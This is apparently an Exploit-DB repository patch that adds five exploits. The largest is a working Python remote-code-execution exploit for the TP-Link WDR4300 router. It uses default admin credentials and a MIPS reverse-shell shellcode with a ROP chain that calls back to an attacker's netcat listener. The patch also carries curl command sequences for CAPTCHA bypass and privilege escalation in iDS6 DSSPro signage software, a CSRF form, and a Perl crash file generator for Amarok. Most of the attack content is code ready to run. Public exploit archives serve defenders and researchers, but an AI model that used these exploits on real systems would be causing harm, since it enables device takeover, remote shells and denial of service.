From 6eb03eae2373167727bc9a47ccd1668688e2747b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 6 Nov 2020 05:01:58 +0000 Subject: [PATCH] DB: 2020-11-06 5 changes to exploits/shellcodes Amarok 2.8.0 - Denial-of-Service TP-Link WDR4300 - Remote Code Execution (Authenticated) iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF) iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation --- exploits/hardware/remote/48994.py | 219 ++++++++++++++++++++++++++++ exploits/hardware/webapps/48990.txt | 61 ++++++++ exploits/hardware/webapps/48991.txt | 77 ++++++++++ exploits/hardware/webapps/48992.txt | 121 +++++++++++++++ exploits/windows/local/48993.pl | 15 ++ files_exploits.csv | 5 + 6 files changed, 498 insertions(+) create mode 100755 exploits/hardware/remote/48994.py create mode 100644 exploits/hardware/webapps/48990.txt create mode 100644 exploits/hardware/webapps/48991.txt create mode 100644 exploits/hardware/webapps/48992.txt create mode 100755 exploits/windows/local/48993.pl diff --git a/exploits/hardware/remote/48994.py b/exploits/hardware/remote/48994.py new file mode 100755 index 000000000..fea6cbe01 --- /dev/null +++ b/exploits/hardware/remote/48994.py @@ -0,0 +1,219 @@ +# Exploit Title: TP-Link WDR4300 - Remote Code Execution (Authenticated) +# Date: 2020-08-28 +# Exploit Author: Patrik Lantz +# Vendor Homepage: https://www.tp-link.com/se/home-networking/wifi-router/tl-wdr4300/ +# Version: TL-WDR4300, N750 Wireless Dual Band Gigabit Router +# Tested on: Firmware version 3.13.33 and 3.14.3 +# CVE : CVE-2017-13772 + +#!/usr/bin/python3 + +import sys +import hashlib +import base64 +import requests +import binascii +import socket + + +""" +RCE via stack-based overflow on TP-Link WDR4300 (N750) devices, using CVE-2017-13772. +Tested on Firmware versions 3.13.33, Build 130618 and 3.14.3 Build 150518, hardware WDR4300 v1 + +Usage: +1) Start listener on attacker machine: nc -nlvvp 31337 +2) Execute script: python exploit.py + +""" + +def main(argv): + if len(sys.argv) < 2: + print("Usage: python exploit.py ") + sys.exit(1) + + password = "admin" + target = "192.168.0.1:80" + attacker_ip = sys.argv[1] + + attacker = binascii.hexlify(socket.inet_aton(attacker_ip)) + ip = [attacker[i:i+2] for i in range(0, len(attacker), 2)] + + if '00' in ip or '20' in ip: + print("[-] Specified attacker IP will result in bad characters being present in the shellcode. Avoid any IPs containing .0. and .32.") + sys.exit(1) + + url = "http://" + target + "/" + try: + r = requests.get(url=url) + except: + print("[-] Could not connect to target: " + target) + sys.exit(1) + + if 'WWW-Authenticate' in r.headers.keys(): + if not 'WDR4300' in r.headers['WWW-Authenticate']: + print("[-] This is not TP-Link WDR4300 (N750)") + sys.exit(1) + else: + print("[-] This does not seem to be the web interface of a router!") + + + credentials = "admin" + ":" + hashlib.md5(password).hexdigest() + auth = base64.b64encode(credentials) + url = "http://" + target + "/userRpm/LoginRpm.htm?Save=Save" + + print("[+] Setting target to: " + target) + print("[+] Using default admin password: " + password) + print("[+] Cookie set to: Authorization=Basic%20" + auth) + + h = {} + h["Cookie"] = "Authorization=Basic%20" + auth + h['Upgrade-Insecure-Requests'] = '1' + h['Referer'] = 'http://' + target + '/' + + r = requests.get(url = url, headers=h) + data = r.text + if "httpAutErrorArray" in data: + print('[-] Could not login to the admin interface') + sys.exit(1) + + older_fw = False + # older firmware, e.g., 3.13.33 + if "Login Incorrect" in data: + print("[-] Incorrect login, perhaps an older firmware? Sending digest authetnication using the Authorization header instead..") + credentials = "admin:" + password + auth = base64.b64encode(credentials) + url = "http://" + target + "/" + h = {} + h["Authorization"] = "Basic%20" + auth + h['Upgrade-Insecure-Requests'] = '1' + h['Referer'] = 'http://' + target + '/' + r = requests.get(url = url, headers=h) + data = r.text + if 'window.parent.location.href' not in data: + print("[-] Failed to login to the admin interface") + sys.exit(1) + print('[+] Older firmware confirmed, successfully logged in') + older_fw = True + + authenticated_url = data.split('window.parent.location.href = ')[1].split(';')[0].replace('"','') + + + unique_id = '' + if not older_fw: + unique_id = authenticated_url.split('/userRpm')[0].split('/')[3] + '/' + print("[+] Authentication succeeded, got unique id: " + unique_id.replace('/','')) + + # now we deliver the exploit payload via a GET request + h['Referer'] = 'http://' + target + '/' + unique_id + 'userRpm/DiagnosticRpm.htm' + + + # NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes) + nopsled = "" + for i in range(12): + nopsled += "\x26\x40\x08\x01" + + # identified bad characters: 0x20,0x00 + # Using reverse tcp shellcode from https://www.exploit-db.com/exploits/45541 + buf = b"" + buf += "\x24\x0f\xff\xfa" # li $t7, -6 + buf += "\x01\xe0\x78\x27" # nor $t7, $zero + buf += "\x21\xe4\xff\xfd" # addi $a0, $t7, -3 + buf += "\x21\xe5\xff\xfd" # addi $a1, $t7, -3 + buf += "\x28\x06\xff\xff" # slti $a2, $zero, -1 + buf += "\x24\x02\x10\x57" # li $v0, 4183 ( sys_socket ) + buf += "\x01\x01\x01\x0c" # syscall 0x40404 + buf += "\xaf\xa2\xff\xff" # sw $v0, -1($sp) + buf += "\x8f\xa4\xff\xff" # lw $a0, -1($sp) + buf += "\x34\x0f\xff\xfd" # li $t7, -3 ( sa_family = AF_INET ) + buf += "\x01\xe0\x78\x27" # nor $t7, $zero + buf += "\xaf\xaf\xff\xe0" # sw $t7, -0x20($sp) + buf += "\x3c\x0e\x7a\x69" # lui $t6, 0x7a69 ( sin_port = 0x7a69 ) + buf += "\x35\xce\x7a\x69" # ori $t6, $t6, 0x7a69 + buf += "\xaf\xae\xff\xe4" # sw $t6, -0x1c($sp) + buf += "\x3c\x0e" + ip[0].decode('hex') + ip[1].decode('hex') # lui $t6, 0xAABB ( sin_addr = 0xAABB ... + buf += "\x35\xce" + ip[2].decode('hex') + ip[3].decode('hex') # ori $t6, $t6, 0xCCDD ... 0xCCDD + buf += "\xaf\xae\xff\xe6" # sw $t6, -0x1a($sp) + buf += "\x27\xa5\xff\xe2" # addiu $a1, $sp, -0x1e + buf += "\x24\x0c\xff\xef" # li $t4, -17 ( addrlen = 16 ) + buf += "\x01\x80\x30\x27" # nor $a2, $t4, $zero + buf += "\x24\x02\x10\x4a" # li $v0, 4170 ( sys_connect ) + buf += "\x01\x01\x01\x0c" # syscall 0x40404 + buf += "\x24\x0f\xff\xfd" # li t7,-3 + buf += "\x01\xe0\x28\x27" # nor a1,t7,zero + buf += "\x8f\xa4\xff\xff" # lw $a0, -1($sp) + buf += "\x24\x02\x0f\xdf" # li $v0, 4063 ( sys_dup2 ) + buf += "\x01\x01\x01\x0c" # syscall 0x40404 + buf += "\x24\xa5\xff\xff" # addi a1,a1,-1 (\x20\xa5\xff\xff) + buf += "\x24\x01\xff\xff" # li at,-1 + buf += "\x14\xa1\xff\xfb" # bne a1,at, dup2_loop + buf += "\x28\x06\xff\xff" # slti $a2, $zero, -1 + buf += "\x3c\x0f\x2f\x2f" # lui $t7, 0x2f2f + buf += "\x35\xef\x62\x69" # ori $t7, $t7, 0x6269 + buf += "\xaf\xaf\xff\xec" # sw $t7, -0x14($sp) + buf += "\x3c\x0e\x6e\x2f" # lui $t6, 0x6e2f + buf += "\x35\xce\x73\x68" # ori $t6, $t6, 0x7368 + buf += "\xaf\xae\xff\xf0" # sw $t6, -0x10($sp) + buf += "\xaf\xa0\xff\xf4" # sw $zero, -0xc($sp) + buf += "\x27\xa4\xff\xec" # addiu $a0, $sp, -0x14 + buf += "\xaf\xa4\xff\xf8" # sw $a0, -8($sp) + buf += "\xaf\xa0\xff\xfc" # sw $zero, -4($sp) + buf += "\x27\xa5\xff\xf8" # addiu $a1, $sp, -8 + buf += "\x24\x02\x0f\xab" # li $v0, 4011 (sys_execve) + buf += "\x01\x01\x01\x0c" # syscall 0x40404 + + shellcode = nopsled + buf + + """ + We control $ra, $s0 and $s1 via the buffer overflow. + + libc_base: 0x2aae2000 + First ROP (sleep_gadget): 0x0004c974 + libc_base = 0x2ab2e974 + 0x0004c97c move t9, s0 + 0x0004c980 lw ra, (var_1ch) + 0x0004c984 lw s0, (var_18h) + 0x0004c988 addiu a0, zero, 2 ; arg1 + 0x0004c98c addiu a1, zero, 1 ; arg2 + 0x0004c990 move a2, zero + 0x0004c994 jr t9 + + sleep is located at 0x00053ca0 => so $s0 = 0x2ab35ca0 + + This gadget calls sleep, in this gadget we also set the return adress to the second ROP gadget which is controlled by setting appropriate value on the stack location 0x1c($sp), i.e., the first value on the stack, due to the instruction at 0x0004c980. + + + Second ROP (stack_gadget): 0x00039fa8 + libc_base = 0x2ab1bfa8 + 0x00039fa8 addiu s0, sp, 0x28 + 0x00039fac move a0, s3 + 0x00039fb0 move a1, s0 + 0x00039fb4 move t9, s1 + 0x00039fb8 jalr t9 + + This gadget will set s0 to point our shellcode on the stack, that must be located at sp+0x28. + Then as we control s1, we jump to the last and third ROP gadget. + + Third ROP (call_gadget): 0x000406d8 + libc_base = 0x2ab226d8 + 0x000406d8 move t9, s0 + 0x000406dc jalr t9 + + Jump to the shellcode pointed in s0. + """ + + sleep_addr = "\x2a\xb3\x5c\xa0" + sleep_gadget = "\x2a\xb2\xe9\x74" + stack_gadget = "\x2a\xb1\xbf\xa8" + call_gadget = "\x2a\xb2\x26\xd8" + + junk = "J"*28 + payload = "A"*160 + sleep_addr + call_gadget + sleep_gadget + junk + stack_gadget + shellcode + + p = {'ping_addr': payload, 'doType': 'ping', 'isNew': 'new', 'sendNum': '4', 'pSize':64, 'overTime':'800', 'trHops':'20'} + url = "http://" + target + "/" + unique_id + "userRpm/PingIframeRpm.htm" + print("[+] Delivering exploit payload to: " + url) + try: + r = requests.get(url = url, params=p, headers=h, timeout=10) + except: + print("[+] Finished delivering exploit") + + +if __name__ == "__main__": + main(sys.argv[1:]) \ No newline at end of file diff --git a/exploits/hardware/webapps/48990.txt b/exploits/hardware/webapps/48990.txt new file mode 100644 index 000000000..babc11d1c --- /dev/null +++ b/exploits/hardware/webapps/48990.txt @@ -0,0 +1,61 @@ +# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF) +# Date: 2020-07-16 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.yerootech.com +# Version: 6.2 + +iDS6 DSSPro Digital Signage System 6.2 Cross-Site Request Forgery (CSRF) + + +Vendor: Guangzhou Yeroo Tech Co., Ltd. +Product web page: http://www.yerootech.com +Affected version: V6.2 B2014.12.12.1220 + V5.6 B2017.07.12.1757 + V4.3 + +Summary: iDS6 Software's DSSPro network digital signage management system +is a web-based server software solution for Windows. + +Desc: The application interface allows users to perform certain actions via +HTTP requests without performing any validity checks to verify the requests. +This can be exploited to perform certain actions with administrative privileges +if a logged-in user visits a malicious web site. + +Tested on: Microsoft Windows XP + Microsoft Windows 7 + Microsfot Windows Server 2008 + Microsoft Windows Server 2012 + Microsoft Windows 10 + Apache Tomcat/8.0.44 + Apache Tomcat/6.0.35 + Apache-Coyote/1.1 + Apache Axis/1.4 + MySQL 5.5.25 + Java 1.8.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5606 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5606.php + + +16.07.2020 + +-- + + +Add user: +--------- + + + +
+ + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/48991.txt b/exploits/hardware/webapps/48991.txt new file mode 100644 index 000000000..d70da2432 --- /dev/null +++ b/exploits/hardware/webapps/48991.txt @@ -0,0 +1,77 @@ +# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass +# Date: 2020-07-16 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.yerootech.com +# Version: 6.2 + +iDS6 DSSPro Digital Signage System 6.2 CAPTCHA Security Bypass + + +Vendor: Guangzhou Yeroo Tech Co., Ltd. +Product web page: http://www.yerootech.com +Affected version: V6.2 B2014.12.12.1220 + V5.6 B2017.07.12.1757 + V4.3 + +Summary: iDS6 Software's DSSPro network digital signage management +system is a web-based server software solution for Windows. + +Desc: The CAPTCHA function for DSSPro is prone to a security bypass +vulnerability that occurs in the CAPTCHA authentication routine. By +requesting the autoLoginVerifyCode object an attacker can receive a +JSON message code and successfully bypass the CAPTCHA-based authentication +challenge and perform brute-force attacks. + +Tested on: Microsoft Windows XP + Microsoft Windows 7 + Microsfot Windows Server 2008 + Microsoft Windows Server 2012 + Microsoft Windows 10 + Apache Tomcat/8.0.44 + Apache Tomcat/6.0.35 + Apache-Coyote/1.1 + Apache Axis/1.4 + MySQL 5.5.25 + Java 1.8.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5607 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5607.php + + +16.07.2020 + +-- + + +Get CAPTCHA code: +----------------- + +$ curl -i http://192.168.1.88/Pages/login\!autoLoginVerifyCode -c cookies.txt + +{"success":true,"message":"6435","data":"6435"} + + +Use CAPTCHA code: +----------------- + +$ curl -i http://192.168.1.88/Pages/login\!userValidate -b cookies.txt -d "shortName=&user.userName=boss&user.password=boss&loginVerifyCode=6435&autoSave=true&autoLogin=true&domain_login=" -v + +HTTP/1.1 200 OK +Server: Apache-Coyote/1.1 +Set-Cookie: cookie.username=boss; Expires=Wed, 21-Jul-2021 19:41:26 GMT +Set-Cookie: cookie.password=boss; Expires=Wed, 01-Jul-2021 19:41:26 GMT +Set-Cookie: cookie.autosave=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT +Set-Cookie: cookie.autologin=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT +Cache-Control: no-cache +Pragma: no-cache +Content-Type: application/x-json;charset=UTF-8 +Date: Tue, 21 Jul 2020 19:41:26 GMT +Connection: close +Content-Length: 16 + +{"success":true} \ No newline at end of file diff --git a/exploits/hardware/webapps/48992.txt b/exploits/hardware/webapps/48992.txt new file mode 100644 index 000000000..1af4479fe --- /dev/null +++ b/exploits/hardware/webapps/48992.txt @@ -0,0 +1,121 @@ +# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation +# Date: 2020-07-16 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.yerootech.com +# Version: 6.2 + +iDS6 DSSPro Digital Signage System 6.2 Improper Access Control Privilege Escalation + + +Vendor: Guangzhou Yeroo Tech Co., Ltd. +Product web page: http://www.yerootech.com +Affected version: V6.2 B2014.12.12.1220 + V5.6 B2017.07.12.1757 + V4.3 + +Summary: iDS6 Software's DSSPro network digital signage management system +is a web-based server software solution for Windows. + +Desc: The application suffers from a privilege escalation vulnerability. +An authenticated user can elevate his/her privileges by calling JS functions +from the console or by insecure direct object references to hidden functionalities +that can result in creating users, modifying roles and permissions and full +takeover of the application. + +Tested on: Microsoft Windows XP + Microsoft Windows 7 + Microsfot Windows Server 2008 + Microsoft Windows Server 2012 + Microsoft Windows 10 + Apache Tomcat/8.0.44 + Apache Tomcat/6.0.35 + Apache-Coyote/1.1 + Apache Axis/1.4 + MySQL 5.5.25 + Java 1.8.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5608 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5608.php + + +16.07.2020 + +-- + + +-------------------- +Default credentials: +-------------------- + +admin:123456 (id: n/k, access: /admin) +boss:boss (id: 100001, access: /) +user:user (id: 100002, access: /) + + +---------------------------- +Once logged-in, create user: +---------------------------- + +In Console, once navigated to the Accounts->User page (http://192.168.1.88/Pages/user.action) +Type: add() + +or issue a POST request: + +$ curl -d "user.userName=testingus&user.password=testingus" http://192.168.1.88/Pages/user\!addUser -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B" + + +-------------- +List user IDs: +-------------- + +$ curl -d "az=asc" http://192.168.1.88/Pages/user\!list -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B" + + +------------ +Create role: +------------ + +In Console, once navigated to the Accounts->Role page (http://192.168.1.88/Pages/role.action): +Type: add() + +or issue a POST request: + +$ curl -d "role.roleName=ROLENAME&role.description=ROLEDESC" http://192.168.1.88/Pages/role\!add -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B" + + +-------------- +List role IDs: +-------------- + +$ curl -X POST http://192.168.1.88/Pages/role\!list -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B" + + +------------------------------------------ +Apply all permissions to the created role: +------------------------------------------ + +$ curl http://192.168.1.88/Pages/role\!updatePermissions -d "role.roleId={ROLE_ID}&privileges=2&privileges=1&privileges=3&privileges=4&privileges=7&privileges=6&privileges=5&privileges=12&privileges=8&privileges=13&privileges=9&privileges=10&privileges=11&privileges=14&privileges=16&privileges=15&privileges=17&privileges=18&privileges=21&privileges=33&privileges=32&privileges=34&privileges=35&privileges=36&privileges=37&privileges=23&privileges=22&privileges=24&privileges=41&privileges=47&privileges=46&privileges=48&privileges=49&privileges=50&privileges=51&privileges=52&privileges=53" + + +------------------------------------ +Assign created role to created user: +------------------------------------ + +$ curl -d "user.userId={USER_ID}&roles={ROLE_ID}" http://192.168.1.88/Pages/user\!updateRole -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B" + + +------------ +Delete user: +------------ + +In Console, once navigated to the Accounts->User page (http://192.168.1.88/Pages/user.action), select desired username: +Type: del() + +or issue a POST request: + +$ curl -d "userid={USER_ID}" http://192.168.1.88/Pages/user\!del -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B" \ No newline at end of file diff --git a/exploits/windows/local/48993.pl b/exploits/windows/local/48993.pl new file mode 100755 index 000000000..57f42b26a --- /dev/null +++ b/exploits/windows/local/48993.pl @@ -0,0 +1,15 @@ +# Exploit Title: Amarok 2.8.0 - Denial-of-Service +# Date: 1 November 2020 +# Exploit Author: FishballAndMeatball +# Vendor Homepage: https://amarok.kde.org/ +# Software link: https://community.kde.org/Amarok/GettingStarted/Download +# Version: Amarok 2.8.0 +# Tested on: Windows 10, Windows 7, Windows XP +# CVE: CVE-2020-13152 + +my $file= “test_big.m3u“; +my $junk= “\x41” x 6368545; +open($FILE,”>$file”); +print $FILE “$junk”; +close($FILE); +print “m3u File Created successfully\n”; \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 93fa6337f..c47e81c8a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10399,6 +10399,7 @@ id,file,description,date,author,type,platform,port 48968,exploits/windows/local/48968.txt,"IP Watcher v3.0.0.30 - 'PACService.exe' Unquoted Service Path",2020-10-28,"Mohammed Alshehri",local,windows, 48982,exploits/windows/local/48982.pdf,"Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)",2020-11-02,"Nassim Asrir",local,windows, 48983,exploits/windows/local/48983.txt,"Quick N Easy FTP Service 3.2 - Unquoted Service Path",2020-11-02,yunaranyancat,local,windows, +48993,exploits/windows/local/48993.pl,"Amarok 2.8.0 - Denial-of-Service",2020-11-05,FishballAndMeatball,local,windows, 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux, 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows, 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows, @@ -17837,6 +17838,7 @@ id,file,description,date,author,type,platform,port 48842,exploits/hardware/remote/48842.py,"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow",2020-10-01,LiquidWorm,remote,hardware, 48954,exploits/hardware/remote/48954.txt,"Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root",2020-10-27,LiquidWorm,remote,hardware, 48958,exploits/hardware/remote/48958.py,"GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse",2020-10-27,LiquidWorm,remote,hardware, +48994,exploits/hardware/remote/48994.py,"TP-Link WDR4300 - Remote Code Execution (Authenticated)",2020-11-05,"Patrik Lantz",remote,hardware, 42806,exploits/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution",2017-09-27,SlidingWindow,remote,java, 42888,exploits/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",remote,hardware, 42891,exploits/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution",2017-09-28,hyp3rlinx,remote,windows, @@ -40808,6 +40810,9 @@ id,file,description,date,author,type,platform,port 48987,exploits/php/webapps/48987.txt,"PDW File Browser 1.3 - Remote Code Execution",2020-11-04,"David Bimmel",webapps,php, 48988,exploits/php/webapps/48988.py,"School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-04,Mosaaed,webapps,php, 48989,exploits/php/webapps/48989.py,"Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-04,Mosaaed,webapps,php, +48990,exploits/hardware/webapps/48990.txt,"iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)",2020-11-05,LiquidWorm,webapps,hardware, +48991,exploits/hardware/webapps/48991.txt,"iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass",2020-11-05,LiquidWorm,webapps,hardware, +48992,exploits/hardware/webapps/48992.txt,"iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation",2020-11-05,LiquidWorm,webapps,hardware, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,